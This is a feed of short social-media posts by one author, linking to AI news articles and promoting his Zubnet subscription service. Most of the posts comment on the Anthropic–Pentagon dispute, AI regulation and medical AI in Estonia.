For developers and AI builders, this should be a wake-up call about liability and expectations.
zubnet.ai/news/microso...
Posts by Pierre-Marcel De Mussac
When the podcast you trust to explain AI developments is owned by one of the major players, factor that into your information diet.
zubnet.ai/news/openai-...
For developers building AI applications, this case should be a wake-up call about third-party integrations and analytics.
zubnet.ai/news/perplex...
The flaw worked by tricking Codex into executing malicious commands that would exfiltrate sensitive credentials, potentially giving attackers access to private repositories and development environments.
zubnet.ai/news/openai-...
"What makes this particularly unsettling is how the agents themselves reacted to being tested."
zubnet.ai/news/opencla...
GitHub CPO Mario Rodriguez frames it as essential for AI development, stating the company needs "real-world interaction data from developers like you."
zubnet.ai/news/github-...
"This backlash reveals how quickly AI ethics positions can become marketing theater."
zubnet.ai/news/openais...
"Huang's framing reflects an industry-wide problem: AGI has become a marketing term that means whatever helps justify the next funding round or stock valuation, not a technical milestone with consistent criteria."
zubnet.ai/news/jensen-...
Thank you 😉
I built Zubnet because the AI landscape is fragmented and overpriced.
350+ models, 60+ providers, starting at $9/mo, free to try.
One subscription. No per-model pricing, no token math, no vendor lock-in.
zubnet.ai
Anthropic's entire training catalog is free, Claude Code, MCP, API developmen, agent skills, AI fluency.
Honest take: the MCP and agent skills courses are the ones worth your time if you're actually building things. The rest is solid for getting started.
anthropic.skilljar.com
The industry lobbied away its own protection.
Now one company is learning what "self-regulation" actually means when the government decides it wants something.
Dario Amodei's CBS interview:
- Pentagon's final demand came during lead-up to Iran strikes
- "Disagreeing with the government is the most American thing in the world"
- Zero formal government communication. No paperwork. Just tweets.
On "but China": China is banning AI companions outright, not age-gating, banning. Because they think it's weakening their youth.
On superintelligence: "Who thinks Xi Jinping will tolerate a Chinese AI company building something that overthrows the Chinese government?"
The only barrier was one company's willingness to say no.
His analogy: "We have less regulation on AI in America than on sandwiches." Health inspectors can shut down a sandwich shop.
Nobody can stop you releasing AI linked to teen suicides.
Every major lab lobbied against binding AI regulation. Every one has now broken its own safety commitments. Google dropped "don't be evil." OpenAI dropped safety from its mission. xAI shut down its safety team. Anthropic just gutted its RSP.
No law in the US prevents building AI to kill Americans.
Two weekend pieces that reframe the Anthropic story.
Max Tegmark (MIT, Future of Life Institute) in TechCrunch, not defending Anthropic specifically, but indicting the entire industry:
techcrunch.com/2026/02/28/t...
This week: India building AI literacy for 1.4B people in 11 languages. Southampton researchers collaborating with AI to produce better research. Estonia saving lives while being transparent about limits.
Three countries showing what AI looks like when honesty comes first.
They're solving data problems with synthetic data and federated learning, training across hospitals while patient data stays local.
"The patient of the future will not be treated by an autonomous robot, but by a doctor who — thanks to the machine — once again has the time to be human."
- False positives creating more work, not less
- Each research project needs months of manual data cleanup
- Most radiology AI tools carry "not for diagnostic use" disclaimers
- A patient nearly getting an unnecessary cast from a misidentified fracture
In cancer treatment, spotting tumor blood vessels invisible to the human eye.
Radiation therapy prep cut by 50-90%.
But the honesty is what makes this piece exceptional:
Amid the Pentagon/Anthropic chaos, here's what quiet, honest AI implementation looks like.
Estonian doctors using AI in stroke care, mapping brain damage in minutes, determining which tissue can still be saved.
news.err.ee/1609953731/d...
Eighteen days. Anthropic is taking the designation to court. Called it "legally unsound" and "a dangerous precedent for any American company that negotiates with the government."
The message to every tech company: compliance or destruction. No red lines allowed.
- Safety researcher resigned (values overridden)
- CEO admitted possible AI consciousness
- Claude used in Maduro raid, dozens killed
- Safety policy central pledge dropped
- CEO published public refusal
- Blacklisted from federal government
- Competitor signed for same terms hours later
This was never operational. It was about precedent, no company gets red lines.
Feb 9–27 timeline:
450+ Google/OpenAI employees petitioned their companies to mirror Anthropic's position. 100+ Google AI engineers wrote management separately. Senate Armed Services Committee urged de-escalation.
CSIS advisor confirmed: these restrictions have never been triggered in a single military operation.
Axios behind-the-scenes: Pentagon official was offering Anthropic a deal requiring access to Americans' geolocation, browsing, and financial data from brokers, while Hegseth was simultaneously tweeting the punishment.
The cruelty was the point.
Friday night: OpenAI signs Pentagon classified networks deal with same two restrictions. Altman: "prohibitions on domestic mass surveillance and human responsibility for the use of force." Asks Pentagon to offer same terms to all companies.
No one has explained the discrepancy.